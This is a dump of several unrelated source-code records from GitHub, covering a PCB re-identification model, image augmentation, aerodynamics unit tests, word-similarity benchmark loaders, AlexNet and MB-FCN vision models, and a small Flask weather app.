Yifan Sun etal. (2018)\nclass PCB(nn.Module):\n def __init__(self, num_classes, pretrained=True):\n super(PCB, self).__init__()\n self.part = 6\n # resnet50\n resnet = models.resnet50(pretrained=pretrained)\n # remove the final downsample\n resnet.layer4[0].downsample[0].stride = (1, 1)\n resnet.layer4[0].conv2.stride = (1, 1)\n modules = list(resnet.children())[:-2]\n self.backbone = nn.Sequential(*modules)\n self.avgpool = nn.AdaptiveAvgPool2d((self.part, 1))\n self.dropout = nn.Dropout(p=0.5)\n\n # define 6 classifiers\n self.classifiers = nn.ModuleList()\n for i in range(self.part):\n self.classifiers.append(ClassBlock(2048, num_classes, True, 256))\n\n def forward(self, x):\n x = self.backbone(x)\n x = self.avgpool(x)\n x = self.dropout(x)\n part = {}\n predict = {}\n # get six part feature batchsize*2048*6\n for i in range(self.part):\n part[i] = x[:, :, i, :]\n part[i] = torch.unsqueeze(part[i], 3)\n predict[i] = self.classifiers[i].add_block(part[i]) # 6*256-dim\n\n scores, features = [], []\n for i in range(self.part):\n scores.append(predict[i].view(predict[i].shape[0], -1)) # id-class or 1536\n return torch.cat(scores, 1) # 1536-dim\n\n\nclass PCBTrain(nn.Module):\n def __init__(self, num_classes, pretrained=True):\n super(PCBTrain, self).__init__()\n self.part = 6\n # resnet50\n resnet = models.resnet50(pretrained=pretrained)\n # remove the final downsample\n resnet.layer4[0].downsample[0].stride = (1, 1)\n resnet.layer4[0].conv2.stride = (1, 1)\n modules = list(resnet.children())[:-2]\n self.backbone = nn.Sequential(*modules)\n self.avgpool = nn.AdaptiveAvgPool2d((self.part, 1))\n self.dropout = nn.Dropout(p=0.5)\n\n # define 6 classifiers\n self.classifiers = nn.ModuleList()\n for i in range(self.part):\n self.classifiers.append(ClassBlock(2048, num_classes, True, 256))\n\n def forward(self, x):\n x = self.backbone(x)\n x = self.avgpool(x)\n x = self.dropout(x)\n part = {}\n predict = {}\n # get six part feature batchsize*2048*6\n for i in range(self.part):\n part[i] = x[:, :, i, :]\n part[i] = torch.unsqueeze(part[i], 3)\n predict[i] = self.classifiers[i](part[i]) # 6*256-dim\n\n scores, features = [], []\n for i 
in range(self.part):\n scores.append(predict[i].view(predict[i].shape[0], -1))\n features.append(part[i].view(predict[i].shape[0], -1))\n return features, scores # 1536-dim\n","repo_name":"FlyingRoastDuck/MetaAttack_AAAI21","sub_path":"reid/models/PCB.py","file_name":"PCB.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"18845830049","text":"import cv2\nfrom keras.preprocessing.image import ImageDataGenerator\nimport sys\nimport os\n\n\npics = 5\ndatagen = ImageDataGenerator(\n zca_whitening=False,\n rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest')\n\ndef gen(folder):\n all_files = os.listdir(folder)\n for f in all_files:\n filename = folder + \"/\" + f\n im = cv2.imread(filename)\n im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)\n im = im.reshape((1,) + im.shape)\n #print(im.shape)\n count = 0\n for b in datagen.flow(im, batch_size=1, save_to_dir=folder, save_prefix=f.split(\".\")[0]):\n count += 1\n if count > pics:\n break\n\n\nif __name__ == \"__main__\":\n gen(sys.argv[1])\n","repo_name":"sepfy/tensorflow-tools","sub_path":"da.py","file_name":"da.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45453569616","text":"import unittest\r\nimport numpy as np\r\nimport os\r\nMyDir=os.path.dirname(__file__)\r\n\r\nfrom scipy.integrate import solve_ivp\r\n\r\nfrom welib.airfoils.Polar import Polar\r\nfrom welib.airfoils.DynamicStall import * \r\n\r\n# --------------------------------------------------------------------------------}\r\n# --- \r\n# --------------------------------------------------------------------------------{\r\nclass TestDynamicStall(unittest.TestCase):\r\n def assertNaN(self,x):\r\n self.assertTrue(np.isnan(x))\r\n\r\n def test_oye(self):\r\n #FFA-W3-241 airfoil Dyna Stall\r\n P=Polar(os.path.join(MyDir,'../data/FFA-W3-241-Re12M.dat'), compute_params=True)\r\n\r\n omega = 12.57\r\n T = 2*np.pi/omega\r\n tau = 0.08\r\n alpham = 20\r\n dt = 0.01 # time step\r\n # \r\n fs_prev = P.fs_interp(alpham) # init with steady value\r\n Cl0 = P.cl_interp(alpham) # init with steady value\r\n Cl_new,fs_prev_new = P.dynaStallOye_DiscreteStep(alpham,tau,fs_prev,dt)\r\n\r\n # Testing that value at t=0 is equal to the steady state cl\r\n np.testing.assert_almost_equal(Cl_new, Cl0, decimal=4)\r\n self.assertEqual(fs_prev_new,fs_prev)\r\n\r\n # An increase of alpha from the steady value should have dCl/dt>0\r\n Cl_new,fs_prev_new = P.dynaStallOye_DiscreteStep(alpham+1,tau,fs_prev,dt)\r\n self.assertEqual( (Cl_new-Cl0)>0 ,True)\r\n self.assertEqual( (fs_prev_new-fs_prev)<0 ,True)\r\n\r\n # A decrease of alpha from the steady value should have dCl/dt<0\r\n Cl_new,fs_prev_new = P.dynaStallOye_DiscreteStep(alpham-1,tau,fs_prev,dt)\r\n self.assertEqual( (Cl_new-Cl0)<0 ,True)\r\n self.assertEqual( (fs_prev_new-fs_prev)>0 ,True)\r\n\r\n\r\n def test_convergence(self):\r\n # Starting from a wrong set point, the Cl value should converge to the steady Cl value\r\n # Script params, reading polar\r\n radians=True\r\n P=Polar(os.path.join(MyDir,'../data/FFA-W3-241-Re12M.dat'), compute_params=True, radians=radians)\r\n U0, chord = 10, 0.1591\r\n alpha_st = 3 * P._alpha0 \r\n tau_t = np.linspace(0,40,30)\r\n vt = chord * tau_t / (2*U0)\r\n \r\n # Oye's Parameters\r\n p_oye = 
dynstall_oye_param_from_polar(P, tau_chord=chord/U0)\r\n p_mhh = dynstall_mhh_param_from_polar(P, chord, constants='OpenFAST')\r\n # Inputs\r\n u=dict()\r\n u['U'] = lambda t: U0\r\n u['U_dot'] = lambda t: 0 \r\n u['alpha'] = lambda t: alpha_st\r\n u['omega'] = lambda t: 0\r\n u['alpha_34'] = u['alpha']\r\n\r\n # Init values, off\r\n y0_oye = [0]\r\n y0_mhh = [0,0,0,0]\r\n\r\n Cl_mhh = np.zeros(len(vt))\r\n Cl_oye = np.zeros(len(vt))\r\n ## Integration using solve_ivp\r\n np.seterr(under='ignore')\r\n sol_mhh = solve_ivp(lambda t,x: dynstall_mhh_dxdt(t,x,u,p_mhh), t_span=[0, max(vt)], y0=y0_mhh, t_eval=vt)\r\n for it,t in enumerate(vt):\r\n Cl_mhh[it],_,_ = dynstall_mhh_outputs(t,sol_mhh.y[:,it],u,p_mhh)\r\n\r\n ## Integration using solve_ivp\r\n sol_oye = solve_ivp(lambda t,x: dynstall_oye_dxdt(t,x,u,p_oye), t_span=[0, max(vt)], y0=y0_oye, t_eval=vt)\r\n for it,t in enumerate(vt):\r\n Cl_oye[it] = dynstall_oye_output(vt[it],sol_oye.y[0,it],u,p_oye)\r\n\r\n ## Steady values\r\n Cl_st = P.cl_interp(alpha_st)\r\n fs_st = P.fs_interp(alpha_st) \r\n\r\n ## --- Test that the last value is the steady state one\r\n np.testing.assert_almost_equal(Cl_mhh[-1], Cl_st, decimal=3)\r\n np.testing.assert_almost_equal(Cl_oye[-1], Cl_st, decimal=3)\r\n np.testing.assert_almost_equal(sol_oye.y[0,-1], fs_st, decimal=3)\r\n\r\n # --- Plot, keep me\r\n #import matplotlib.pyplot as plt\r\n #fig=plt.figure()\r\n #ax = fig.add_subplot(111)\r\n #ax.plot(tau_t,Cl_mhh[:]/Cl_st ,'--',label = 'Cl dynamic (MHH)')\r\n #ax.plot(tau_t,Cl_oye[:]/Cl_st ,'-' ,label = 'Cl dynamic (Oye)')\r\n #ax.set_xlabel('Dimensionless time [-]')\r\n #ax.set_ylabel('Cl [-]')\r\n #plt.legend()\r\n #plt.show()\r\n\r\n # \r\n #y0_mhh = dynstall_mhh_steady(0,u,p_mhh)\r\n\r\n\r\n def test_mhh_wagner_step(self):\r\n # Step from alpha0 to alpha0+2, testing the circulatory response (history), \r\n # The Cl result is compared to Wagner's function\r\n radians=True # <<<\r\n P=Polar(os.path.join(MyDir,'../data/FFA-W3-241-Re12M.dat'), compute_params=True, radians=radians)\r\n\r\n U0, chord = 10, 0.1591\r\n alpha1 = P._alpha0 \r\n alpha2 = alpha1+2*np.pi/180\r\n tau_t = np.linspace(0,30,100)\r\n vt = chord * tau_t / (2*U0)\r\n\r\n ## MHH Parameters and Inputs\r\n np.seterr(under='ignore')\r\n p = dynstall_mhh_param_from_polar(P, chord, constants='Jones')\r\n u=dict()\r\n u['U'] = lambda t: U0\r\n u['U_dot'] = lambda t: 0 \r\n u['alpha'] = lambda t: alpha1 if t<=0 else alpha2 \r\n u['omega'] = lambda t: 0\r\n u['alpha_34'] = u['alpha']\r\n ## Steady values\r\n Cl_st2 = P.cl_interp(alpha2)\r\n y0_mhh = dynstall_mhh_steady(0,u,p)\r\n\r\n Cl_mhh = np.zeros(len(vt))\r\n # Integration using solve_ivp\r\n sol_mhh = solve_ivp(lambda t,x: dynstall_mhh_dxdt(t,x,u,p), t_span=[0, max(vt)], y0=y0_mhh, t_eval=vt)\r\n for it,t in enumerate(vt):\r\n Cl_mhh[it],_,_ = dynstall_mhh_outputs(t,sol_mhh.y[:,it],u,p)\r\n\r\n Cl_wag_Jones=wagner(tau_t, constants='Jones')\r\n\r\n np.testing.assert_almost_equal(Cl_mhh[1:]/Cl_st2,Cl_wag_Jones[1:],decimal=4)\r\n\r\n # --- Plot, keep me\r\n #import matplotlib.pyplot as plt\r\n #fig=plt.figure()\r\n #ax = fig.add_subplot(111)\r\n #ax.plot(tau_t ,Cl_wag_Jones,'k' ,label='Wagner function (Jones approx.)')\r\n #ax.plot(tau_t[1:],Cl_mhh[1:]/Cl_st2 ,'--',label = 'Cl dynamic (MHH)')\r\n #ax.set_xlabel('Dimensionless time 2 U_0 t/c [-]')\r\n #ax.set_ylabel('Cl/Cl_ref [-]')\r\n #plt.ylim([0.3,1.1])\r\n #plt.title('Response to an angle of attack change')\r\n #plt.legend()\r\n #plt.show()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n 
unittest.main()\r\n","repo_name":"ebranlard/welib","sub_path":"welib/airfoils/tests/test_dynamic_stall.py","file_name":"test_dynamic_stall.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"77"} +{"seq_id":"5300980529","text":"'''\nCreated on Apr 27, 2018\n\n@author: terry\n'''\nimport os\nfrom default import bench_data\nfrom default import semantic_parser as sp\n#===============================================================================\n# INPUT TEXT PROCESSMENT\n#===============================================================================\ndef process_ws353(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Token_Data(block[0],block[1],float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of ws353 data from 0.0 to 10.0\n\ndef process_rg65(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(';') #delimiter\n tmp_token = bench_data.Token_Data(block[0],block[1],float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of rg65 data 0.0 to 4.0\n\ndef process_simlex999(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[3].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of simlex999 linear mapped from 0 to 6 -> 0.0 to 10.0 - only same pos are comapred\n\ndef process_men(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(' ') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of MEN linear mapped from 1 to 7\n\ndef process_mc28(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(';') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of MC28 linear mapped from 0 to 4\n\ndef process_yp130(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(' ') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of YP130 linear mapped from 0 to 4\n\ndef process_simverb(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[3].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of SimVerb-3500 linear mapped from 0 to 10\n\ndef process_stanford(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Stanford_Data(block[1], 
block[2], block[3], block[4], block[5], block[6], float(block[7].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of Stanford linear mapped from 0.0 to 10.0\n\ndef sentece_wrapper(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n work_token = bench_data.Work_Data()\n work_token.word1 = block[1]\n work_token.word2 = block[3]\n work_token.sent1 = sp.tokenize_text(block[5])\n work_token.sent2 = sp.tokenize_text(block[6])\n work_token.simvalue = float(block[7].strip('\\n'))\n tokens_list.append(work_token)\n return(tokens_list)\n#reads and wraps tab-separated tokens into Work_Data objects\n#creates a list of Stanford linear mapped from 0.0 to 10.0\n\n#===============================================================================\n# FOLDER MANIPULATION\n#===============================================================================\n\ndef fname_splitter(docslist):\n fnames = []\n for doc in docslist:\n blocks = doc.split('\\\\')\n fnames.append(blocks[len(blocks)-1])\n return(fnames)\n#gets the filenames from the URIs of whatever documents were processed in the input folder\n\ndef doclist_multifolder(folder_name):\n input_file_list = []\n for roots, dir, files in os.walk(folder_name):\n for file in files:\n file_uri = os.path.join(roots, file)\n #file_uri = file_uri.replace(\"\\\\\",\"/\") #if running on windows \n if file_uri.endswith('txt'): input_file_list.append(file_uri)\n return input_file_list\n#creates a list of documents across many folders\n\ndef write_ind_tokens(folder, fname, tokens): \n #print('Saving %s Document' %bsd_fname)\n doc = open(folder +'/'+ fname, 'w+') \n #currently using just Word \\t SynsetID \\t offset \\t pos\n for token in tokens:\n doc.write(token.word1 +'\\t'+ token.word2 +'\\t'+ str(token.simvalue) + '\\n')\n doc.close()\n#writes output file with word1 word2 sim_value\n","repo_name":"truas/ValidateSimilarity","sub_path":"default/io_operations.py","file_name":"io_operations.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"33110265208","text":"import torch\nimport torch.nn as nn\nfrom collections import OrderedDict\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nclass AlexNet(nn.Module):\n \"\"\"\n The original network was split across two GPUs; only one half is implemented here.\n Input - 3x227x227\n <1>\n C1 - 48@55x55 (11x11 kernel)(4 stride)\n ReLU1\n S1 - 48@27x27 (3x3 kernel, stride 2) Subsampling\n LRN\n <2>\n C2 - 128@27x27 (5x5 kernel)(1 stride)(2 padding)\n ReLU2\n S2 - 128@13x13 (3x3 kernel, stride 2) Subsampling\n LRN\n <3>\n C3 - 192@13x13 (3x3 kernel)(1 stride)(1 padding)\n ReLU3\n <4>\n C4 - 192@13x13 (3x3 kernel)(1 stride)(1 padding)\n ReLU4\n <5>\n C5 - 128@13x13 (3x3 kernel)(1 stride)(1 padding)\n ReLU5\n S5 - 128@6x6 (3x3 kernel, stride 2) Subsampling\n <6>\n C6 - 2048@1x1 (6x6 kernel)\n ReLU6\n Dropout (p=0.5)\n <7>\n F7 - 2048\n ReLU7\n Dropout (p=0.5)\n <8>\n F8 - 6 (Output)\n \"\"\"\n def __init__(self):\n super(AlexNet, self).__init__()\n\n self.convnet = nn.Sequential(OrderedDict([\n ('C1 ', nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2)),\n ('ReLU1', nn.ReLU(inplace=True)),\n ('S1 ', nn.MaxPool2d(kernel_size=3, stride=2)),\n\n ('C2 ', nn.Conv2d(64, 192, kernel_size=5, padding=2)),\n ('ReLU2', nn.ReLU(inplace=True)),\n ('S2 ', nn.MaxPool2d(kernel_size=3, stride=2)),\n ('C3 ', nn.Conv2d(192, 384, kernel_size=3, 
padding=1)),\n ('ReLU3', nn.ReLU(inplace=True)),\n ('C4 ', nn.Conv2d(384, 256, kernel_size=3, padding=1)),\n ('ReLU4', nn.ReLU(inplace=True)),\n ('C5 ', nn.Conv2d(256, 256, kernel_size=3, padding=1)),\n ('ReLU5', nn.ReLU(inplace=True)),\n ('S5 ', nn.MaxPool2d(kernel_size=3, stride=2)),\n\n ('Avg6 ', nn.AdaptiveAvgPool2d((6, 6))),\n ('Drop6', nn.Dropout()),\n ]))\n\n self.fc = nn.Sequential(OrderedDict([\n ('F7 ', nn.Linear(256*6*6, 1024)),\n ('ReLU7', nn.ReLU(inplace=True)),\n ('Drop7', nn.Dropout()),\n ('F8 ', nn.Linear(1024, 6)),\n ]))\n\n def forward(self, x):\n x = self.convnet(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n return x\n\n\nclass CarDataset(Dataset):\n \"\"\"Car dataset loader\"\"\"\n\n def __init__(self, datapath, train=True):\n \"\"\"\n Args:\n datapath: filename\n train (optional): train data or test data\n\n \"\"\"\n self.label = []\n self.image = []\n self.train = train\n self.len = 0\n self.N = 227\n\n # load the dataset: each train sample is 1 label line plus 3 channel rows; test samples have 3 channel rows only\n tmp = []\n k = 0\n if train:\n with open(datapath, 'r', encoding='ascii') as fp:\n for line in fp:\n k += 1\n if k==1:\n self.label.append(int(line))\n else:\n img = np.array(line.split(','), dtype = float)\n tmp.append(img.reshape(self.N, self.N))\n if k==4:\n self.image.append(tmp)\n tmp = []\n k = 0\n else:\n with open(datapath, 'r', encoding='ascii') as fp:\n for line in fp:\n k += 1\n img = np.array(line.split(','), dtype = float)\n tmp.append(img.reshape(self.N, self.N))\n if k==3:\n self.image.append(tmp)\n tmp = []\n k = 0\n self.image = torch.from_numpy(np.array(self.image))\n self.len = len(self.image)\n\n\n def __len__(self):\n return self.len\n\n def __getitem__(self, idx):\n if self.train:\n return (self.image[idx].float(), torch.tensor(self.label[idx]))\n else:\n return self.image[idx]\n\n def shape(self):\n print(self.image.shape)\n \n def show(self, idx):\n if self.train:\n print(self.label[idx])\n img = np.array(self.image[idx], dtype=int)\n img = np.transpose(img, (1,2,0))\n plt.imshow(img)\n plt.show()\n \n\n\n\nif __name__ == '__main__':\n\n net = AlexNet()\n print(net)\n\n","repo_name":"Ten2016/Graduation-design","sub_path":"code/AlexNet_model.py","file_name":"AlexNet_model.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"193940210","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/29 21:02\n# @Author : Godder\n# @File : mb_fcn.py\n########################################\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom layers.functions import Detect, PriorBoxLayer\nimport math\nimport os\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.downsample = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.downsample = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)), inplace=True)\n out = F.relu(self.bn2(self.conv2(out)), inplace=True)\n out = 
self.bn3(self.conv3(out))\n out += self.downsample(x)\n out = F.relu(out, inplace=True)\n return out\n\n\nclass MB_FCN(nn.Module):\n def __init__(self, phase, num_class, block, num_blocks, size, connections, strides):\n super(MB_FCN, self).__init__()\n self.phase = phase\n self.in_planes = 64\n self.num_class = num_class\n self.size = size\n self.priorboxs = PriorBoxLayer(size, size, stride=strides)\n self.priors = None\n self.connections = connections\n self.strides = strides\n\n # Resnet network\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n # adjust the strides so deep layers keep the same receptive-field scale as shallow ones (only layer4 is modified)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=1)\n out_channels = [64, 64 * 4, 128 * 4, 256 * 4, 512 * 4]\n\n # max-pooling layers used for downsampling\n self.downsample_maxpools = list() # type: list\n self.downsample_features = list() # type: list\n # transposed-convolution layers used for upsampling\n self.deconvs = list() # type: list\n self.upsample_features = list() # type: list\n upsample_padding = [(1, 1), (0, 1), (0, 5)] # padding parameters for the transposed convolutions, for 2x, 4x and 8x upsampling\n self.out_channels = []\n for stride, connection in zip(strides, connections):\n pools = list()\n deconv = list()\n down_features = list()\n up_features = list()\n channels = 0\n for c in connection:\n channels += out_channels[c-1]\n current_stride = pow(2, c)\n if c == 5:\n current_stride //= 2\n if pow(2, c) < stride:\n pool = nn.MaxPool2d(kernel_size=3, stride=stride // pow(2, c), padding=1) # type: nn.MaxPool2d\n if c == 5:\n pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) # type: nn.MaxPool2d\n pools.append(pool)\n down_features.append(c)\n elif current_stride > stride:\n upsample_time = current_stride // stride\n padding_index = int(math.log(upsample_time, 2) - 1)\n convT = nn.ConvTranspose2d(out_channels[c - 1], out_channels[c - 1], kernel_size=3, \\\n stride=upsample_time, padding=upsample_padding[padding_index][0], \\\n output_padding=upsample_padding[padding_index][1])\n deconv.append(convT)\n up_features.append(c)\n self.downsample_maxpools.append(pools)\n self.downsample_features.append(down_features)\n self.deconvs.append(deconv)\n self.upsample_features.append(up_features)\n self.out_channels.append(channels)\n\n # single conv layers that extract box-location and face-confidence information\n loc = []\n conf = []\n for channels in self.out_channels:\n loc.append(nn.Conv2d(channels, 4, kernel_size=3, stride=1, padding=1))\n conf.append(nn.Conv2d(channels, 4, kernel_size=3, stride=1, padding=1))\n self.loc = nn.ModuleList(loc)\n self.conf = nn.ModuleList(conf)\n\n if phase == 'test':\n self.softmax = nn.Softmax(dim=-1)\n self.detect = Detect(num_class, 0, 750, 0.05, 0.3)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1) # [stride, 1, 1...(num_blocks-1)]\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n source = list() # stores the features of each branch\n loc = list()\n conf = list()\n\n # ResNet feature extraction\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x1 = self.maxpool(x) # type: torch.Tensor\n\n x2 = self.layer1(x1) # type: torch.Tensor\n x3 = self.layer2(x2) # type: 
torch.Tensor\n x4 = self.layer3(x3) # type: torch.Tensor\n x5 = self.layer4(x4) # type: torch.Tensor\n features = [x1, x2, x3, x4, x5]\n\n # extract the features of each branch and merge them into source\n for down_pools, down_features, deconv, up_features, connection in\\\n zip(self.downsample_maxpools, self.downsample_features, self.deconvs, self.upsample_features, self.connections):\n connection_features = []\n i = 0\n j = 0\n for c in connection:\n feature = features[c - 1]\n if c in down_features:\n feature = down_pools[i](feature)\n i += 1\n elif c in up_features:\n feature = deconv[j](feature)\n j += 1\n connection_features.append(feature)\n source.append(torch.cat(connection_features, 1))\n\n # prior box generation\n prior_box = []\n for idx, f_layer in enumerate(source): #type: int, torch.Tensor\n prior_box.append(self.priorboxs.forward(idx, f_layer.shape[3], f_layer.shape[2]))\n with torch.no_grad():\n self.priors = torch.cat([p for p in prior_box], 0)\n print(self.priors.shape, prior_box[0].shape)\n\n # extract loc/conf predictions from every feature map\n for idx, (x, l, c) in enumerate(zip(source, self.loc, self.conf)):\n if idx == 0: # shallow branch\n tmp_conf = c(x) # type: torch.Tensor\n a, b, c, pos_conf = tmp_conf.chunk(4, 1)\n neg_conf = torch.cat([a, b, c], 1) # type: torch.Tensor\n max_conf, _ = neg_conf.max(1)\n max_conf = max_conf.view_as(pos_conf)\n conf.append(torch.cat([max_conf, pos_conf], 1).permute(0, 2, 3, 1).contiguous())\n else:\n tmp_conf = c(x) # type: torch.Tensor\n neg_conf, a, b, c = tmp_conf.chunk(4, 1)\n pos_conf = torch.cat([a, b, c], 1) # type: torch.Tensor\n max_conf, _ = pos_conf.max(1) # type: torch.Tensor, torch.Tensor\n max_conf = max_conf.view_as(neg_conf)\n conf.append(torch.cat([neg_conf, max_conf], 1).permute(0, 2, 3, 1).contiguous())\n loc.append(l(x).permute(0, 2, 3, 1).contiguous())\n\n # flatten and gather the predictions\n loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1) # reshape each loc tensor to (batch_size, H*W*4), then concatenate\n conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1) # (batch_size, H*W*2)\n\n if self.phase == \"test\":\n output = self.detect(\n loc.view(loc.size(0), -1, 4), # loc preds\n self.softmax(conf.view(conf.size(0), -1, 2)), # conf preds\n self.priors.type(type(x.data)) # default boxes\n )\n else:\n output = (\n loc.view(loc.size(0), -1, 4), # (batch_size, H*W, 4)\n conf.view(conf.size(0), -1, 2), # (batch_size, H*W, 2)\n self.priors,\n )\n return output\n\n def load_weights(self, base_file):\n other, ext = os.path.splitext(base_file)\n if ext == '.pkl' or ext == '.pth':\n print('Loading weights into state dict...')\n pretrained_model = torch.load(base_file, map_location=lambda storage, loc: storage)\n model_dict = self.state_dict()\n pretrained_model = {k: v for k, v in pretrained_model.items() if k in model_dict}\n model_dict.update(pretrained_model)\n self.load_state_dict(model_dict)\n print('Finished!')\n else:\n print('Sorry only .pth and .pkl files supported.')\n\n\ndef build_model(phase, size=640, num_class=2):\n if phase != \"test\" and phase != \"train\":\n print(\"Error: Phase not recognized\")\n return\n if size != 640:\n print(\"Error: Sorry only 640 is supported currently!\")\n return\n return MB_FCN(phase, num_class, Bottleneck, [3, 4, 6, 3], size, [[3, 4, 5], [4, 5]], [8, 16])\n","repo_name":"WangGodder/MB-FCN_pytorch","sub_path":"mb_fcn.py","file_name":"mb_fcn.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"}
{"seq_id":"41181631680","text":"from flask import render_template,request\nimport requests\nfrom datetime import 
datetime\nfrom app import app\n\n\n@app.route('/', methods = ['GET', 'POST'])\ndef mainpage():\n dt = datetime.now()\n dt = dt.strftime('%d/%m/%Y %I:%M %p')\n city = \"\"\n state = \"\"\n tempf = \"\"\n skycondition =\"\"\n reportfrom = \"\"\n currweathericon = \"\"\n if request.method == 'POST':\n city = request.form['city']\n state = request.form['state']\n\n if city != \"\":\n r = requests.get(\"http://api.wunderground.com/api/b912244185f64b1c/geolookup/conditions/q/\"+ state +\"/\"+ city+\".json\")\n data = r.json()\n currweathericon = str(data['current_observation']['icon_url'])\n tempf = str(data['current_observation']['temp_f']) + \"F\"\n skycondition = data['current_observation']['weather']\n reportfrom = data['current_observation']['observation_location']['full']\n\n return render_template('mainpage.html',city = city,\n state = state,\n dt=dt,\n currweathericon=currweathericon,\n tempf = tempf,\n skycondition = skycondition,\n reportfrom = reportfrom)\n","repo_name":"tallenttu/weatherapplication","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16609256336","text":"import unittest\nfrom unittest.mock import Mock\n\nfrom aops_check.errors.startup_error import StartupError\n\n\nclass StartupErrorTestCase(unittest.TestCase):\n def test_get_check_mode_property(self):\n check_mode = Mock()\n error = StartupError(check_mode, Mock())\n self.assertEqual(error.check_mode, check_mode)\n\n def test_get_support_mode_property(self):\n support_mode = [Mock(), Mock()]\n error = StartupError(Mock(), support_mode)\n self.assertEqual(error.support_mode, support_mode)\n\n def test_str_should_return_correct_result(self):\n check_mode = \"a\"\n support_mode = [\"b\", \"c\"]\n error = StartupError(check_mode, support_mode)\n self.assertEqual(str(error), f\"Check module's mode should be in ['b', 